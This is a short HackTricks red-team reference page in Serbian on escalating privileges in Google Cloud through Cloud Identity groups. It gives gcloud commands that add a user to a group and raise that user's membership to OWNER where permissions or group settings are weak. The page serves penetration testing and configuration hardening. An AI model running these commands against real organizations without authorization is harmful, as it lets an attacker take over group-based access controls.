GCP - Cloudidentity Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Cloudidentity

Za više informacija o cloudidentity servisu, pogledajte ovu stranicu:

GCP - IAM, Principals & Org Policies Enum

Dodajte sebe u grupu

Ako vaš korisnik ima dovoljno dozvola ili je grupa loše konfigurisana, može postati član nove grupe:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Izmena članstva u grupi

Ako korisnik ima dovoljno dozvola ili je grupa netačno konfigurisana, može postati VLASNIK grupe čiji je član:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated